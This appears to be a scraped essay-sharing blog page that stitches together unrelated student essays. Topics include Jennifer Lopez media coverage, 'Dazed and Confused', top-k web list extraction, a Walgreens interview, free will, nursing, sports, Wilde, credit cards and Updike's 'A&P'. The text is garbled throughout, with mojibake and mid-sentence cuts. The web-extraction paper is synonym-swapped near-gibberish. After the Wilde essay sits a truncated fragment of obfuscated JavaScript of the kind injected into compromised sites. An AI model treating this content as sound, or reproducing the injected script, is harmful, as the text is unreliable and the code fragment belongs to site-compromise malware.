to her image as the newspaper continues to say, But with a reported entourage of 20 staff apparently tending to her every whim, it seems hard to believe. Yes this is hard to believe; as she wouldnt have 20 people tending to her every need when she was younger and this tells us fame has affected her. The newspaper tells us Jennifer will be appearing on a T. V. show to find out whether fame has affected or changed her. This newspaper does not give a very good positive attitude towards Jennifer Lopez as the paper says she a Diva which is not a compliment for any star. The next paragraph gives a different perspective as they bring in Ben Affleck her fianci e for her forthcoming marriage. They write saying that her wedding is pronounced the wedding of the year as later she does not get married at all, but this paper is not a new one. Born in New Yorks tough Bronx district in 1970, Jen knew from an early age she wanted to be a superstar and she did become a superstar. The paper is about the life of Jennifer Lopez, you would think they would talk about her childhood first but they bring this subject up in the 4th paragraph, she was supposedly was born and brought up in the Bronx district, but this is false according to information over the internet I researched. Later we find out her parents wanted her to go to college and become a lawyer were she would have made more money than she is making now, which is enough anyway, but she might not have enjoyed it as much as becoming a singer, actress and a star. The paper also tells us her becoming famous was a sudden move from coming through a Janet Jackson song, US comedy and on a big screen with George Clooney in Out of Sight which brought her up to becoming a star. We see Jennifer wanted to be famous as she has got it all looks, career, singing voice and of course Ben. Her picture in the newspaper article does not seem to have been enhanced or edited by the looks of it as it shows herself and her fianci e, the picture has not much to edit, as it is clear enough for the public to know what is going on. Again the newspaper article cannot have a lot of force compared to the video clip, as neither the magazine article or the newspaper article have either motion clips or sound to go with the video. In the video of Jennifer Lopez we see and hear of her becoming famous from the Latina actress herself. While the program runs and shows of Jennifer Lopez in films or singing, the program has a continuous song in the background of her own. Each song they show on the program, they only show clips that the audience and viewers want to see, so they bring out the best bits of the song, while watching the video I noticed she changed her clothes a lot through each screen shot, this may have something to do when they only take the best part of herself when showing in her songs. I noticed she changed her clothes from top to bottom at a total of 8 times. An advantage for us when watching the program is you can hear what she says for real and cannot be made up by some newspaper or magazine article. There is also a lot of dialogue throughout the program as most of it occurs through the interview of Jennifer Lopez. The video shows a very positive image of Jennifer as the video itself is self-promoting a well. Also each screenshot in the songs have also been edited as extra light has been added to give that extra look of the sexy body she has. Jennifer is the centre of attention in this interview as almost every screenshot shows her, the program also shows a little girl trying to dance and sing, this is representing Jennifer when she was at a younger age dreaming of what she wanted to become. Jennifer quotes, I still feel the same exact way as I started, and this is same to her lyrics in the newspaper article as although she may say she feels the same, her dress sense and appearance ahs gone up a level since she became a star. During some of the songs I noticed she dressed mostly in white with a dark background such as a dark blue to bring Jennifer in to the centre of the spotlight, this is a very clever trick indeed not just a persuasive technique towards the public but it also brings her body looks in towards the spotlight. In one of her songs, if you had my love, we see in the video she is silhouetted which gives a kind of a sexual nature of her being and as she goes on to say would you comfort me, this is giving a sexual image to her character. The list of three is brought in the program when it says actor, dancer, singer, also to make a rhythm assonance is used with the word er also with a comment on voyeuristic quality. During the interview with Jennifer Lopez a lot of lighting has been added to show Jennifers beautiful golden, healthy, fit looking skin. Her skin is reflected back in to the camera so it gives the viewers what they wanted to see. I think given reading both the newspaper article and the magazine article and watching the Jennifer Lopez video I think the video would promote better to give a very positive image of herself and her body. I chose this because the magazine article has a very short amount of text with a large picture of Jennifer Lopez, the picture we were given was in black white which was a bit of a disadvantage which I have already said and also the quotes, which are used, may not be for real. I never chose the newspaper article because the paper talks about her life not from the beginning of her life but when she became a star and worked away from there and the picture being rather small with her fianci e beside her. The video is the only source of information, which would be easy for self-promotion and cannot be mistaken for her quote she used as you can take them straight from the dialogue of her interview. The video has music of Jennifers solo played continuously, which for some viewers is attracted to, and her appearance she had at the interview.

Wednesday, August 21, 2019

Dazed and Confused Essay Example for Free

Dazed and Confused Essay Dazed and Confused List and describe 4 characters that are important to the movie: Randall Pink FloydFloyd is the stud senior quarterback who realizes he doesn’t want to be just a quarterback for the rest of his life and questions his role in the social pack. He cant stand Coach Conrad and the pledge sheet hes making all the players sign. Hes going out with Simone, but hed like to hook up with Jodi. He seems to belong to all cliques. Mitch KramerMitch is going to be a freshman in high school and hes already getting picked on by the senior class. Lack of parental supervision (and help from Pink and his pals) allows Mitch to experience high school life a little earlier than most of his classmates. Kramer is the new kid on the block who, like Pink, has an amazing athletic talent and a way with the ladies| Fred OBannionOBannion is a super-senior who is enjoying his second straight year of hazing freshmen. He has a temper, and when the freshmen get their revenge he blows up and drives away in his piece-of-junk car. | David WoodersonWooderson, a former superstar quarterback and graduate working for the city after realizing that life after his alma matter is sweeter when you live by your own rules. The high schoolers think hes cool because hes older and he has a nice car. Many of the classic lines in this movie to come from Wooderson. | Q: What does the movie teach us about life? The movie dazed and confused is more than just a movie about smoking marijuana. It documents the changes we all face in life, as social and political pressures increase, when one gets older and faces decisions that require you to figure out how to avoid being what others want you to be while staying young at heart. Q: What is your favorite part of the movie? My favorite part in the movie is when they are sitting on the 50-yard line of the football field smoking marijuana, reminiscing and having laughs. While Matthew McConaughey â€Å"Wooderson†, says a very memorable quote, â€Å"Man, its the same bull***t they tried to pull in my day. If it aint that piece of paper, theres some other choice theyre gonna try and make for you. You gotta do what Randall Pink Floyd wants to do man. Let me tell you this, the older you do get the more rules theyre gonna try to get you to follow. You just gotta keep livin man, L-I-V-I-N†. Q: Why is that your favorite part of the movie? This is my favorite part of the movie because it reminds me of me and my friends back in the day. Plus the quote â€Å"You just gotta keep livin man, L-I-V-I-N† is one of my favorite quotes of life! Q: Do you believe the movie is realistic? Why or why not? I believe the movie is realistic because the director made the characters all so different and have their own personalities. It’s also realistic because the audience can relate to at least one character in the movie. Q: What have you learned from this movie? Society is full of constraints and limitations that people in power: or those looking to capitalize on the weakness of others place on others to get them to act the way they want them to. If you want to be free of such people and situations, you have to learn how to challenge the social constructs and rules that keep you from finding your true purpose in life. Don’t let others tell you what you can and can’t do. This doesn’t mean that you have a right to break the laws, but it does mean that you can be anything you want to be if you are willing to go after it. There are no laws that say you have to be what someone else wants you to be. Q: Who do you think (what age group, or what kind of person) would enjoy this type of movie? I think Teenagers all the way up to Elders; of both genders, would enjoy this movie. Everybody who has watched it will watch again and again, and never will get old to them. For those who haven’t watched it, WATCH IT! Other important Information Director: written and directed by Richard Linklater Producers: Sean Daniel, Richard Linklater, Jim Jacks and co-producer Anne Walker-McBay * Jason London as Randall Pink Floyd * Wiley Wiggins as Mitch Kramer * Rory Cochrane as Ron Slater * Sasha Jenson as Don Dawson * Michelle Burke as Jodi Kramer * Christine Harnos as Kaye Faulkner * Adam Goldberg as Mike Newhouse * Anthony Rapp as Tony Olson * Matthew McConaughey as David Wooderson * Marissa Ribisi as Cynthia Dunn * Jason London as Randall Pink Floyd * Wiley Wiggins as Mitch Kramer * Rory Cochrane as Ron Slater * Sasha Jenson as Don Dawson * Michelle Burke as Jodi Kramer * Christine Harnos as Kaye Faulkner Adam Goldberg as Mike Newhouse * Anthony Rapp as Tony Olson * Matthew McConaughey as David Wooderson * Marissa Ribisi as Cynthia Dunn Starring: * Jason O. Smith as Melvin Spivey * Shawn Andrews as Kevin Pickford * Cole Hauser as Benny ODonnell * Milla Jovovich as Michelle Burroughs * Joey Lauren Adams as Simone Kerr * Christin Hinojosa as Sabrina Davis * Ben Affleck as Fred OBanni on * Parker Posey as Darla Marks * Deena Martin as Shavonne Wright * Nicky Katt as Clint Bruno * Esteban Powell as Carl Burnett * Renee Zellweger as Nesi White Awards Year| Result| Award| Category/Recipient(s)| 1993 | Nominated| Golden Leopard| Richard Linklater| 994 | Nominated| Young Artist Award| Best Youth Actor Co-Starring in a Motion Picture Drama Jason London| Rating: (R) Running time: 102 minutes Other: Lawsuit In October 2004, three of Linklaters former classmates from Huntsville High School, whose surnames are Wooderson, Slater, and Floyd, filed a defamation lawsuit against Linklater, claiming to be the basis for the similarly named characters on the film. The lawsuit was filed in New Mexico rather than Texas because New Mexico has a longer statute of limitations. The suit was subsequently dismissed

Tuesday, August 20, 2019

Exclusion of Data Records from Documents of Web

Exclusion of Data Records from Documents of Web ABSTRACT: Ranking is tremendously significant in information retrieval. Most information on web is unstructured text in natural languages, as well as extracting information from natural language text is extremely hard. A lot of current effort has focused on obtaining knowledge from structured information on web, especially from web tables. But most significantly, title of a top-k page frequently evidently disclose context, which makes page interpretable as well as extractable. Rather than focusing on structured data as well as ignoring context, we spotlight on context that we can recognize, and then we make use of context to interpretless controlled or approximately free-text information, and direct its extraction. We spotlight on a prosperous as well as expensive source of information on web, which we describe top-k web pages. Top-k lists contain additional significant and appealing circumstance, and are additional probable to be helpful in search, as well as previous interactive systems. Unl ike web tables, which hold a set of items, items within a top-k list is typically ranked consistent with a principle described by title of top-k page. There are quite a lot of reasons to make use of the page title to recognize a top-k page. Top-K Ranker ranks candidate set as well as picks top ranked list as top-k list by a score function which is a subjective sum of two. Keywords: Top-k page, Web pages, Unstructured text, Ranking, Information extraction. 1. INTRODUCTION: World Wide Web is an enormous and speedily mounting repository of information. There are a variety of objects embedded in statically as well as energetically made Web pages. Web services moreover are used to respond exact conjunctive queries, which require quite a lot of search on Web and unite across them, if done physically by means of a search engine. In the earlier period,  information extraction was used on minute harmonized corpora. Accordingly, conventional information extraction systems are capable to rely on weighty linguistic technology tuned to domain of attention. These systems were not intended to extent comparative to the extent of corpus or number of associations removed, while parameters were unchanging and diminutive. A lot of current effort has focused on obtaining knowledge from structured information on web, especially from web tables. Consequently, understanding context is tremendously important in information extraction. Regrettably, in the majority of cases, context is conveyed in unstructured text that machines are unable to interpret. In the majority cases, description is in natural language text which is not unswervingly machined interpretable, even though the explanation has the similar format for different items. But most significantly, title of a top-k page frequently evidently disclose context, which makes page interpretable as well as extractable. We mark top-k pages in support of information extraction for reasons such as: Top-k data on web is large as well as rich. The top-k information is moreover prosperous in terms of content obtained for every item in list. Top-k data is of high superiority and it is normally cleaner than previous forms of data on web. Most data on web is in free text, which is tough to interpret. Web tables are structured, however merely an extremely minute percentage of them enclose meaningful as well as useful information. On the contrary top-k pages contain a general style: the page title hold the numb er as well as concept of items in list. Every item is considered as an example of page title, and numeral of items has to be equal to number stated in title. 2. METHODOLOGY: Most information on web is unstructured text in natural languages, as well as extracting information from natural language text is extremely hard. Some information on web exists in controlled or else semi-structured forms. It is true that entire number of web tables is enormous in entire corpus, however only an extremely minute percentage of them hold helpful information. There are a variety of objects embedded in statically as well as energetically made Web pages. An even lesser percentage of them contain information interpretable devoid of context. Rather than focusing on structured data as well as ignoring context, we spotlight on context that we can recognize, and then we make use of context to interpretless controlled or approximately free-text information, and direct its extraction. We spotlight on a prosperous as well as expensive source of information on web, which we describe top-k web pages. the proposed system which includes components: such as Title Classifier, which effo rt to be familiar with page title of input webpage; Candidate Picker, which take out the entire prospective top-k lists from page body like candidate lists; Top-K Ranker, which score every candidate list as well as picks most excellent one; Content Processor, which post process take out list to additionally make attribute values. Atop-k web page explains k items of meticulous interest. We build up a system that takes out top-k lists from a web corpus that holds billions of pages. Top-k lists enclose rich as well as expensive information. Especially compared with web tables, top-k lists enclose a well-built quantity of data, which is of superior quality. Top-k lists contain additional significant and appealing circumstance, and are additional probable to be helpful in search, as well as previous interactive systems. Unlike web tables, which hold a set of items, items within a top-k list is typically ranked consistent with a principle described by title of top-k page. Ranking is treme ndously significant in information retrieval. Fig1: An overview of system representation. 3. EXTRACTION OF INFORMATION FROM TOP-K WEB PAGES: The block diagram shown in fig1 reveals the proposed system which includes components: such as Title Classifier, which effort to be familiar with page title of input webpage; Candidate Picker, which take out the entire prospective top-k lists from page body like candidate lists; Top-K Ranker, which score every candidate list as well as picks most excellent one; Content Processor, which post process take out list to additionally make attribute values. The top-k information is moreover prosperous in terms of content obtained for every item in list. Top-k data is of high superiority and it is normally cleaner than previous forms of data on web. The title of web page helps us recognize a top-k page. There are quite a lot of reasons to make use of the page title to recognize a top-k page. For the majority cases, page titles provide to bring in topic of the main body. While the page body may possibly have diverse as well as complex formats, top-k page title includes comparatively comparabl e structure. Title examination is lightweight and well-organized. If title examination indicates that a page is not a top-k page, we choose to pass over this page. This is significant if system has to extent towards billions of web pages. A web page by a top-k title might not contain a top-k list. Candidate Picker step take out one or additional list structures which become visible to be top-k lists from a prearranged page. A top-k candidate has to first and for mainly be a list concerning k items, visually, it have to be provided as k vertically or else horizontally aligned standard patterns. While structurally, it is obtainable as a list of HTML nodes by identical tag path which is path from root node towards a convinced tag node, which is presented as a succession of tag names. Top-K Ranker ranks candidate set as well as picks top ranked list as top-k list by a score function which is a subjective sum of two. Subsequent to getting top-k list, we take out attribute or value pairs for every item from description of item in list. 4. CONCLUSION: Web services moreover are used to respond exact conjunctive queries, which require quite a lot of search on Web and unite across them, if done physically by means of a search engine. Conventional information extraction systems are capable to rely on weighty linguistic technology tuned to domain of attention which were not intended to extent comparative to the extent of corpus or number of associations removed, while parameters were unchanging and diminutive. In the majority cases, description is in natural language text which is not unswervingly machined interpretable, even though the explanation has the similar format for different items. Web tables are structured, however merely an extremely minute percentage of them enclose meaningful as well as useful information. Some information on web exists in controlled or else semi-structured forms. It is true that entire number of web tables is enormous in entire corpus, however only an extremely minute percentage of them hold helpful info rmation. spotlight on a prosperous as well as expensive source of information on web, which we describe top-k web pages. We build up a system that takes out top-k lists from a web corpus that holds billions of pages. While the page body may possibly have diverse as well as complex formats, top-k page title includes comparatively comparable structure. Top-k lists enclose rich as well as expensive information. The top-k information is moreover prosperous in terms of content obtained for every item in list. Top-k data is of high superiority and it is normally cleaner than previous forms of data on web.

Monday, August 19, 2019

Interview With a Walgreens Manager Essay -- business interviews, caree

Since 1901, Walgreens has had a strong passion for customer service. The founder, Charles Walgreens, goal was to create a drugstore that was like no other. He said that for as many drugstores as he had worked at, he had never worked for one that had a focus for good customer service and low prices. Walgreens has grown by leaps and bounds since 1901 and is now recognized as the leader in the market with over 7000 stores. Charles Walgreen had an eye for good managers. He said he was able to pick people that he knew were smarter than him so to promote them and make them the heads of his drugstores. As a store manager, not only is it your job to run a store which includes ordering, customer care, and inventory control, but also it is your job to manage the staff. As a part of managing staff, it is their responsibility to hire, train and develop, and terminate if need be. While there are many jobs to choose from when it comes to HR and employee staffing, I choose this one because it is by far to me the most intense. Walgreens is a very well known name when it comes to drugstores. However, most people don’t know how big â€Å"big† is. In this case it is 7,015 stores nationwide. On average, each store has 30 employees on staff. This means that the company has 211,000 employees working for them. This type of responsibility calls for an HR department. In this company however it is done a little differently. When it comes to hiring staff for a store, it is solely up to the store manager. The HR department functions as a reference source for the store managers only (typically in cases of discipline). This is a great undertaking for a store manager when they are first promoted. As a store manager, you are faced with ever... gave me the opportunity to see what was out there in terms of HR staffing. I think that when people think of HR they think of a cubical at an office remotely placed somewhere. This is not the case. HR has many settings whether it is the corner store or the corporate office. Through this exercise I saw firsthand what HR was all about. It is about setting the example and staying motivated for the staff. I also discovered that money is not everything. In any job the money can’t be everything, you have to find rewards through other avenues; avenues such watching employees move up or customers leaving with a smile. HR gives you great flexibility and has many different settings to work in. I choose to interview a store manager because I am hoping to get to that position in the near future. This was a great experience for me and I learned a lot through this activity.

Free Will Versus Determinism Essay -- essays research papers

Free Will Versus Determinism The controversy between free will and determinism has been argued about for years. What is the difference between the two? Looking in a dictionary, free will is the power, attributed to human beings, of making free choices that are unconstrained by external circumstances or by an agency such as fate or divine will. Free will allows free choice. Yet, determinism is the total opposite. Determinism has this definition: The philosophical doctrine that every event, act, and decision is the inescapable consequence of antecedents that are independent of the human will. Determinism states that humans have no free will to choose what they wish. That seems real extreme and harsh. Even though this is what determinism is, doesn't mean that the determinists are trying to steal your freedom. It's only what they believe because of religion and cause and effect. In religion, many people believe in the existence of a god supports determinism. The basis of god is that he is all-knowing and all-powerful. If free will is allowed, there would be decisions and actions in which God could not know due to the person's choice. This would limit God's omnipotence, which is unacceptable to some. The other argument for determinism is causation, or causes and effects. This argument depends on relationships that should happen with the same results every time, such as a baseball breaking a window, breaking the window. Basing on this, everything in the universe has a cause. And if all the causes and the events were known, then it would be possible to easily predict the future. If everything can be foreseen, then this proves that nothing that anyone does can change the courses of the future. This, of course, is not possible. Determinism says that what you do can be the cause of what your life turns out to be. This can be true. Yet, you can act otherwise that would steer you off that path of where your life was heading. Common sense tells us that we can change, which determinism opposes to. It also says that if we feel we are not forced, we could have acted differently. That is why I choose to side with free will. Determinism has too many extremes and limits that, already shown, is not possible in this world. Free will is the mind's ability to choose with intelligence. That doesn't mean that our choice has all the freedom in the world. Our choices cannot and ob... ...ermined by previous events. Therefore we can not change our behavior. Previous events do affects us; we cannot ignore that. But, like the previous examples, if the previous events' consequences were not good, we would mostly likely change, unless that individual was deranged. These arguments on free will definitely does not pertain to all people. Everyone is different. Yet mostly likely, individuals think towards free will. An implication to determinism is that man becomes nothing more than a puppet. That may sound cruel, but it is true. Under the rules of determinism, man must go by past events, doing the same thing he did in the past, right or wrong. He can not change his behavior, unable to let out his emotions. The man has become a puppet, being controlled and restricted. And in everyday life, determinism does not exist in most lives. It is logical and reasonable to say that the all of free will is a measure of our humanness. Whatever we choose will effect our future. But we will base our decisions on what we feel is right, taking in our moral feelings. Free will is a measure of self-determination that people feel themselves to possess and by which they make moral judgments.

Sunday, August 18, 2019

Elevating the Voice of the Patient Essay -- Nursing Essays

In any healthcare setting, a patient should be able to influence their own care and treatment. However, there may be particular obstacles that may prevent a patient from voicing their opinions regarding their care and treatment. The purpose of this essay is to discuss three barriers: how a patient can overcome not being empowered; staff having limited knowledge and insufficient training regarding certain mental health issues and poor communication. These barriers will be related to recent clinical experience. The aim of this essay is to consider how each of these barriers diminished the voice of the patient and how these were overcome. Empowerment is a relatively new concept in healthcare; it follows the theory that every person should be entitled to make decisions about their own healthcare (Gohde, 2011). It is important that a patient can feel empowered – that they can feel instrumental in their own care – so that they may begin to recover. In previous years, patients were passive recipients of care (Latvala, 2000) but now they are more active in making decisions about their care. Patient empowerment is vital in promoting a positive outcome for a nurse – patient relationship (Spence Lashinger, 2010). An example of patient empowerment is the experience of Emily, who is a twenty-five year old female with a diagnosis of anorexia nervosa. Emily was diagnosed eight years ago and subsequently is well known to her local NHS Psychiatric Services. Emily was recently admitted into a Psychiatric Admissions Ward at her local NHS hospital under a Compulsory Treatment Order (Scottish Government, 2004) afte r attempting suicide following an episode of severe starvation. When the student nurse commenced placement at the ward in which Emily h... Eating Disorders Review (8) page 293-300 Sanfter JL (2011) â€Å"Quality of Life in Relation to Psychosocial Risk Variables for Eating Disorders in Women and Men† Eating Behaviours 12 (2) page 136-142 Scottish Government (2004) The New Mental Health Act – What’s It All About? A Short Introduction. Available online at, first accessed 28/04/2011 Sheldon LK (2009) â€Å"Communication for Nurses†, Second Edition, London, James and Bartlett, page 81-82 Snell L, Crowe M, Jordan J (2010) â€Å"Maintaining a Therapeutic Connection: Nursing in an Inpatient Eating Disorders Unit† Journal of Clinical Nursing 19 (3-4) page 358 Spence Laschinger HK (2010) â€Å"Towards a Comprehensive Theory of Nurse – Patient Empowerment: Applying Kanter’s Empowerment Theory to Patient Care† Journal of Nursing Management. 18 (1) page 4-13

Saturday, August 17, 2019

Importance of Playing Sports Essay

But I think as generation is passing by the importance of sports and games is diminishing.Todays youth is more interested in virtual games like playing Xbox ,PS,mobile games rather than real games which could be beneficial for them.Not only shifting of interest to virtual games,some have reasons of studies or work and they are not able to take out time for sports and games or they don’t give much importance to it.But here my motive is to make you aware of its benefits and what are the things you are loosing if you don’t have time or you don’t have any importance for it. Playing sports and games can give you a numerous benefits which can lead to overall improvement of your body both mentally and physically.Lets check out what are the benefits it can give you. I Assume that everybody knows how important it is for physical health.Not only it keeps you fit and healthy for a period of time in fact it helps you for life time. I have seen many people at mature age they find difficulties with physical fitness.A strong reasons for many can be at their young age they never gave importance for sports. Researches are found the evidence that at age of maturity or old age the person who were found with difficulties physical and health ,for many, reasons were the same. Playing sports can boast up your strength which leads to activeness.It keeps you active all the time whether at time of work or studies. As I mentioned above that sports and games can lead to a very fit and fine body.You don’t have to go gym for body fitness ,Sports is enough to keep your body fit. Builds up energy, stamina and strength. For health and mind both sports and games are very beneficial.It keeps you fit from inside,improves immune system which in turn gives a healthy and fit body. It helps in refreshing your mind.Working or studying all the time can make make your thinking, decision or learning power low.,makes your life more with stress ,tension and workload.So here taking out some time to play some sports or games can makes you distress. Research and study have reported that those who play sports and games at young age they have much growth of mind as compared to others.Games like chess, Sudoku ,Monopoly,Scrabble helps you in opening a mind and growth to think. I think that life is very similar to sports and games.So I believe that it can teach you a lot of things which can help in many ways in your normal life. Sports and games teaches a young mind a lot of things ,Decision making is one of them.You know when you play some sports or game you have to make some decisions these decisions train your mind how to make decisions in life. Playing games and sports give you a lot of motivation in life at the time of your difficult situations, hectic life etc.. When you play sports which need team members to play ,it teaches you how to work in a team,teaches you strength of unity,team bonding.This helps you at time when you are working at some place which requires team work. It teaches you how to make a discipline in personal and professional life. When you play sports or some game ,some time the situation get very crucial and that time you have to get down all your capabilities to focus.Same things happens in life when you struggling with crucial situations. Sports and games teaches you the art of patience at difficult times in life. As I mentioned above it keeps you fit mentally as well as physically all over your life time.Lower the chances of diseases and physical problems. Sports and games are nothing without challenges.You have to take challenges from your self as well as from opponent. This teaches you how to accept challenges in normal life. Likewise there are many things a person can learn from sports and games, not only for professional life but personal life too. When we talk about the sports and games, there are many which are beneficial for normal person but here I will tell you those sports and games for which you don’t need high skills and extra efforts to play.I have divided the list of sports and games according to physical and mental benefits. Physical Football Swimming Cycling Basket ball Rope skipping Running| Mental Chess Scrabble Sudoku Monopoly Snake and ladders(refreshment)| How to take out time for Sports and games? I know many have reasons that they don’t have much time other than their work or studies but it is not possible.Its all about managing the time,so for making out time for sports and games you need to mange your time that’s it. Half or an hour a day is enough to keep you healthy and fit with other benefits.Who all are working can make out their time after the work post probably the evening and those who are studying can make out time when taking breaks.

Friday, August 16, 2019

Aspects of comedy present in pages 1-10 of ‘The Importance of Being Earnest’ Essay

Numerous aspects of comedy can be found in pages one to ten of ‘The Importance of Being Earnest’. The aspect of servants and masters is one that presents itself immediately in the play, through the relationship that exists between Algernon, the ‘master’, and Lane, the servant. The first thing that is spoken about between these two characters, is Algernon’s piano playing. Upon being asked â€Å"Did you hear what I was playing, Lane?† Lane replies, â€Å"I didn’t think it polite to listen, sir.† This is comic for a couple of reasons. Firstly, it could be interpreted that Lane is, subtly, scolding Algernon for even thinking that a servant would listen to his master playing the piano, which is funny as it should be Algernon doing the scolding, as master. Secondly, Lane could simply be poking fun at the Victorian social system; ridiculing it at the fact that Lane should not even be allowed to listen to Algernon play, which may seem ridiculous to his character, and perhaps the audience also, especially in the present day. Another aspect of comedy presented in the first ten pages of ‘The Importance of Being Earnest’ is Bathos. Bathos is when a topic falls from something sublime and important, to something mundane and trivial. This occurs when Algernon is talking to Lane about afternoon tea, â€Å"Speaking of the science of Life, have you got the cucumber sandwiches cut for Lady Bracknell?†. This is comic as ‘cucumber sandwiches’ are , obviously, totally unrelated to ‘the science of Life’, and in normal society would not be considered as neither important nor particularly interesting, something which either Algernon or Lady Bracknell would clearly be inclined to disagree with. This reference to cucumber sandwiches, and there importance, also pokes fun at Victorian high society; the things important in their lives would seem trivial and insignificant to the rest of society, and not at all ‘high’ in importance. Marriage, also, is presented in this scene, once again through Algernon. After Jack informs Algernon that he wishes to propose to Gwendolen, Algernon replies â€Å"I thought you had come up here for pleasure? †¦ I call that business†. Here, Algernon undermines the idea of marriage and proposal,saying that he sees it as business, and later on saying that he finds not at all romantic. Cynicism is applied here, and is used comically by Wilde to, once again, highlight the odd way that things of great importance are treated by Algernon, and perhaps by the rest of the upper-classes too. Town vs. country is another aspect that is presented in this section of the play, this time through Jack, or Ernest. â€Å"When one is in town one amuses oneself, when one is in the country one amuses others. It is excessively boring.†, is what Jack tells Algernon when questioned by him why he was in the country. This line is a poignant one, as it highlights both what people thought about ‘the country’ as opposed to ‘the town’ in Victorian society, and also the double identity of Jack, which is the main recurring theme throughout the rest of the play. It also shows not only the fictitious feelings created by Jack, for his alter ego Ernest, but also perhaps, the true feelings of Jack himself, hinting at why he visits London so often. There are also minor slapstick influences in this part of ‘The Importance of Being Earnest’, for example when Jack ‘puts out his hand to take a sandwich’ and ‘Algernon at once interferes’, however this relies entirely upon how the director interprets the stage directions, and will most likely vary from production to production. Although, slapstick could be used to make this part of the play more comic, for example if Algernon were to very obviously slap Jack’s hand away, and appear offended. These are just a few examples of some of the aspects of comedy that can be found from the first scene of ‘The Importance of Being Earnest’. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=†Ã¢â‚¬ ,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return ""},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Thursday, August 15, 2019

Suzie Orman

In the essay that Suze Orman wrote, â€Å"How to Take Control of Your Credit Cards†, Orman says that it is only a matter of choice whether or not you learn to take control of your credit cards. Orman states, when you’re paying high interest rates on credit cards you have maxed out, you could be paying ridiculous amounts of money just in interest. And it could take you years to pay it off. People often overspend on there credit cards, charging anything and everything they purchase on them.Which leads them to being broke either by choice or in a crisis. Orman says, you should only charge what you can afford on your credit cards. Just because you have a high credit amount, doesn’t mean to go out and buy things that aren’t a necessity to you. Orman says; before you select a credit card you should always find the lowest interest rate for the credit card, for which you will only have to pay less in interest. You are more likely to get a lower interest rate if yo u have a strong FICO score.The credit card companies don’t like to make your interest rate low because that means they don’t make much money off of you. When you start using the credit card that you pick, always make sure you make your payments on time; if you don’t then your interest rate will sky rocket. If you mail your payment, make sure it’s mailed at least 5 days before it is due. Not on the due date, because that will be considered late. If you are dealing with multiple credit cards, you are to always try and pay off the credit cards with the highest interest rate, not the one with the highest balance.Making more then the minimum payment each month could saves you big bucks in the long run. The people that can’t control their credit cards, there is counseling available to help manage your finances. Orman suggests to choice an honest and fair credit counseling service; you do this by getting reference from the National Foundation for Credit C ounseling. In searching, a good counselor will make a face-to-face appointment to talk with you in detail about your financial situation before any further action is suggested.A bad counselor will tell you right off the bat that you need a debt management plan before even knowing your current financial situation. A good counselor will also require you to enroll in education classes. In this essay, Orman proves that there are many ways to control your credit card debts and how to responsibly choose the right credit cards based on interest rates. Orman demonstrates that choosing wisely will prevent needing any kind of debt counseling.

Wednesday, August 14, 2019

The Anatomy of a Decision

At the end of John Updike’s short story, all the main characters were at odds with each other. A&P grocery store clerk Sammy, who is the main protagonist of the story, Lengel the manager of the grocery store, and the three young bikini-clad ladies who caught Sammy’s attention, were all arguing over the dress code of the store.The ladies in bikinis just came by to buy a herring snacks from the grocery, much to the delight of Sammy, who enjoyed observing and sexually fantasizing about the bodies of the three women.However, the ladies were reprimanded by Lengel for their inappropriate clothing which he deemed should only be worn in a beach. Seeing that the ladies of his interest were embarrassed, Sammy willingly resigns from his job in order to stand for what he feels is right. On a personal note, although his decision to quit his job as a store clerk in order to protect the ladies’ interests is notable, I do not agree with Sammy’s actions simply because it w as immature and irrational.At the beginning of the story, Sammy fantasizes about the ladies, who enter the grocery store in bikinis, like any young boy would. He observes their clothing and bodies in a very detailed manner as if he wanted to remove them himself: â€Å"There was this chunky one, with a two-piece. It was bright green and the seams on the bra were still sharp and her belly was still pretty pale† (Updike, 1961).He also comes up with his own opinion of their personalities: â€Å"There was this one, with one of those chubby berry-faces, the lips all bunched together under her nose, this one, and tall one, with black hair that had not quite frizzed right†¦. You know their kind of girl other girls think very ‘Striking’ and ‘Attractive.’ She was the queen with ‘Long white prima-Donna legs’† (Updike, 1961). In short, his vivid descriptions of the three ladies no doubt show that he has a profound interest in them, which taints the moral justification of his decision to quit his job.Initially, it would appear that his resignation was mainly to protest the undue embarrassment that his boss, Lengel, caused the ladies. However, as shown in the end, Sammy’s move was primarily for the purpose of appearing as a hero to the three women.When he decided to quit his job, Sammy said, â€Å"The girls, and who'd blame them, are in a hurry to get out, so I say ‘I quit’ to Lengel quick enough for them to hear, hoping they'll stop and watch me, their unsuspected hero.† Meaning to say, although he pointed out that he resigned in protest of his manager’s harsh actions towards the ladies, his actions were simply meant for show.Clearly, Sammy’s actions were signs of immaturity, which is arguably common among people his age. One does not simply quit a job in order to show off to women. His decision can be likened to a young boy desperately trying to impress a girl he likes, but fails in his attempt. He is a classic case of acting first without thinking and only realizing the folly of his actions after seeing the end result, which is expectedly not what he desires. Sammy obviously acted on impulse and as a result, the consequences were severe.As implied in the story, Sammy’s job as a clerk in the A&P grocery store is very important to his parents, who possibly partially depend on his income. As Lengel said in his attempt to convince Sammy to reconsider his decision to quit, â€Å"Sammy, you don’t want to do this to your Mom and Dad† (Updike, 1961.). It can then be deduced that Sammy was not only working for himself but also helping his parents augment their family income.Meaning to say, Sammy’s decision to resign from his job possibly had a greater impact than what he imagined. And he realized this in the end, as he knew that his parents would not understand and accept that the reason behind his sacrifice to protest the actions o f Lengel, whom he believes was very harsh towards the girls.Furthermore, despite his belief that what he did was heroic, Sammy cannot, in any way, be conceived as a hero in the context of the story simply because his efforts were fruitless. Although it can be argued that Sammy symbolizes a revolt against the prejudicial mentality epitomized by Lengel, in the end, the former still gained nothing out of his actions and therefore, cannot be considered as someone who fought for a justifiable cause.

Islamic Financial Instruments on stock markets in GCC Essay

